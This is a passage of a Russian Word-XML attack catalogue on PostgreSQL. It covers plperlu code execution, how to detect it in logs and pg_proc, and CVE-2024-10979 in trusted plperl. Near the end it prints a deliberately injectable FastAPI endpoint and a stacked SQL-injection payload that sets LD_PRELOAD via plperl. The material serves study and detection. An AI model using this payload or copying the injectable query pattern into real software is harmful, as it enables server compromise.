          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgresql-plperl-16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и т.д. в Debian/Ubuntu; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgresql17-plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в RHEL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C568723" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет специальных требований.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8B3A09" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plperlu используется для админских хелперов, которым нужен доступ к OS: парсинг файлов конфигурации, легковесный shell-вызов из триггера. В production-кодах встречается </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>редко</w:t>
      </w:r>
      <w:r>
        <w:t>, потому что обычно вытеснен внешними batch-скриптами на cron. Признаки атаки в логах:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E2976" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement = 'ddl'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION ... LANGUAGE plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не-DBA сессии</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>application_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, по сетевому источнику). DBA создают plperlu-функции редко и в постоянных схемах, не в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_temp</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C96491" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — здесь можно отлавливать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prolang = 'plperlu'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и алертить.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4623DA34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc.prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для функций в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_temp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит backtick-shell-вызовы, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>qx//</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — статический сканер по слепкам </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6876DA53" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Аномальный исходящий трафик с DB-хоста (см. 3.7.1 — те же сигналы).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A28F66" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plperlu стабильно работает с PG 9.0. Никаких CVE в самом plperlu (untrusted) — он намеренно без sandbox; security-граница на уровне привилегии CREATE FUNCTION. CVE случались в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>trusted plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (CVE-2024-10979, см. 3.7.2b; CVE-2010-1170 «trust» через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и др.) — это сценарий выхода из sandbox в trusted-варианте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21640F74" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B18EFD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 COPY PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — альтернатива с похожими привилегиями (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или superuser). COPY PROGRAM не требует CREATE EXTENSION, поэтому быстрее для one-shot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C73C14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.2b CVE-2024-10979</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — путь к Perl-RCE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>без</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> superuser через trusted plperl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A589FA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.3 plpython3u / plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — те же untrusted-механики, другие языки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F0F7ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — extension scripts: компрометация .sql-файла расширения в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SHAREDIR/extension/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> даёт пре-installed RCE через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (актуально, если plperlu установлен через скомпрометированное расширение).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B63EC0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стакинг для протаскивания </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION ... ; SELECT fn()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через одну точку инъекции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4363AE53" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62238CE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «PL/Perl — Perl Procedural Language» — https://www.postgresql.org/docs/current/plperl.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E06EB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Trusted and Untrusted PL/Perl» — https://www.postgresql.org/docs/current/plperl-trusted.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2503B680" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   HackTricks: «PostgreSQL injection» (раздел RCE через plperlu) — https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D0E71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PortSwigger SQLi cheat sheet, PostgreSQL section — https://portswigger.net/web-security/sql-injection/cheat-sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9FB288" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Rapid7 Metasploit: модули для plperlu RCE — https://www.rapid7.com/db/?q=postgres+perl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B90EF0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R7 (sources/research.md)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3230029E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.7.2b CVE-2024-10979 в plperl trusted (путь от PUBLIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E13E16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> До PostgreSQL 17.1 (и параллельных minor-фиксов) trusted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> неверно ограничивал доступ к Perl-переменной </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%ENV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sandbox должен был блокировать модификацию environment-переменных backend-процесса, но позволял её. Атакующий с правом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION LANGUAGE plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (выдано PUBLIC по умолчанию) может изменить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ENV{'PATH'}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ENV{'LD_PRELOAD'}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; следующий подпроцесс, форкнутый backend-ом, наследует изменённый env — что даёт PATH-hijack или library-injection и в итоге RCE как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Единственный путь к RCE без superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в категории 3.7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A17D844" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD06F5C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/reports/run.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4D0147"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3736C700" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7D2C68"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1C1D70B8"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3079FBA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B79047" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6726DB7E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BF5999" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>@router.get("/reports/{report_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD20D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def run_report(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2141C547" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    report_id: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733A0138"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134DA5AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D999B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # обычная application-роль; не superuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEAE057" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"SELECT execute_report({report_id})")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAD41CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await session.execute(query).scalar()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C200EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Конкатенация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>report_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + application-роль с правом CREATE на собственной user-schema (либо до PG 15 — на public). Стакинг (см. 3.5) даёт инъекцию payload-функции в той же сессии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AA91CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — LD_PRELOAD-инъекция</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A7B85E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Базовый PoC (из репозитория gh-ost00/CVE-2024-10979 и разбора RedRays).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0858BAA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `report_id`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFD5D9A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1); CREATE OR REPLACE FUNCTION pg_temp.preload() RETURNS void LANGUAGE plperl AS $perl$ $ENV{'LD_PRELOAD'} = '/tmp/x.so'; $perl$; SELECT pg_temp.preload(); --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FCBAFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
